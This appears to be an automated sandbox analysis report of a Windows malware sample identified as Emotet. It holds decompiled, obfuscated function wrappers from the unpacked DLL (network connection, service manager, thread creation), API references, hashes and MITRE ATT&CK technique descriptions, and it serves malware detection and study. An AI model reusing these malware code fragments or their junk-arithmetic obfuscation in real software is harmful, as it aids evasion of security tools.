0x1000f335
0x1000f33a
0x1000f33b
0x1000f340
0x1000f341
0x1000f344
0x1000f348
0x1000f34f
0x1000f356
0x1000f35d
0x1000f370
0x1000f373
0x1000f374
0x1000f383
0x1000f389

APIs

InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 1000F383

Strings

O$, xrefs: 1000F34F

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: InternetOpen
String ID: O$
API String ID: 2038078732-838329570
Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction ID: 8289a683938989030ca0da7dfac6b892ab059c1ea5f0d65067220e4f4b31d72f
Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction Fuzzy Hash: FA1113B1C0122DBB9B15DFA58C4A8DFBFB8EF05654F108589F814A6110C3B15A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000E0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 1000E168

Strings

|p, xrefs: 1000E0FA

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: InfoNativeSystem
String ID: |p
API String ID: 1721193555-2455131449
Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction ID: 87fad81da9970c7bb3d4b7ae9dd0f5802466cf3bbb0c04d9c31e1761e8e9e04e
Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction Fuzzy Hash: 662138B6D00318FFDB48CFA4C8468EEBBB4FB44310F108599E41566291D3B85B50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E1001FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E10002309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,10015191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 1001FF4C

Strings

OMk, xrefs: 1001FEC1

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 1d80d5bf462f7d76a803e315767f53b854081a7213ef634c08bc69ad92fa0287
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 6D1113B2C0022CBBEB11DFA5D94A8EFBFB4EF44318F108188E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E10002309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 10011A79

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 4460bfc2ec69cb6a9c9d4ae8ab6b4977e7447a0d843199ae8caee7af6f2384ce
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E021E27280021DFBDF05CF95D8498DEBFB6EF49354F108188F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 100230FB, Relevance: 1.6, APIs: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E100230FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E10022523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E10002309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}

0x10023102
0x10023106
0x1002310e
0x1002310f
0x10023110
0x10023113
0x10023116
0x10023117
0x1002311a
0x1002311d
0x10023120
0x10023123
0x10023126
0x10023129
0x1002312a
0x1002312b
0x10023130
0x1002313a
0x10023143
0x1002314a
0x10023151
0x10023158
0x1002315c
0x10023163
0x1002316f
0x10023177
0x1002317a
0x1002317e
0x10023185
0x1002318c
0x10023190
0x10023194
0x100231b4
0x100231ca
0x100231d1

APIs

InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 100231CA

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction ID: e8187c32b4ec5569a964266e9532cb42533e4eb402820abbfec73acb79da3654
Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction Fuzzy Hash: 28212876900248BBDF01CFA6DC49CDFBFB9EB89B14F118149F92466220C7759A60DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100138CA, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E100138CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E10022523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E10002309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}

0x100138d1
0x100138d6
0x100138d7
0x100138da
0x100138db
0x100138de
0x100138e1
0x100138e4
0x100138e7
0x100138ea
0x100138eb
0x100138ed
0x100138f2
0x100138fc
0x1001390a
0x10013912
0x10013915
0x1001391c
0x10013923
0x1001392a
0x10013931
0x10013938
0x1001393f
0x10013946
0x1001394d
0x10013954
0x10013967
0x1001396f
0x10013982
0x10013994
0x1001399a

APIs

CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 10013994

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction ID: 5a6dbe2e242c64283d159b8d6af8574c24e4c451ce92a937a7e8d2536125472d
Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction Fuzzy Hash: 6921E275801219BBCF15CFE9DD4A8DFBFB9FF09214F108188F918A6120D3B19A249FA0

Uniqueness

Uniqueness Score: -1.00%

Function 10002985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10002985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E10002309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 10002A3E

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: a28c389faf7b726d87918facb3c60479c9af1eed29e3a2ef13c7030710ba699e
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 84215372C00208BBDF18CFA8D84A8DEBFB5FB41710F108098E824A6210E3B4AB14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10017708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100177B6

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: e01db37ee4e11aec0ed8fe9f4a455c9f05bd25de310d07c039ce80a3f7d39afa
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: CC1134B6D00209FBDB08CFA4D94A9AEBBB4FF44304F108189E814AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 1001A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E10022523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E10002309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 1001A601

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 916d80f1436c55e495bde87e87ea32654bf5eec04e964754689aa7ec780072d2
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1F11F3B5C1030DFBCB18DFE8D8869AEBBB4EF44304F108698A855A6261D3B56B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report pYebrdRKvR

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

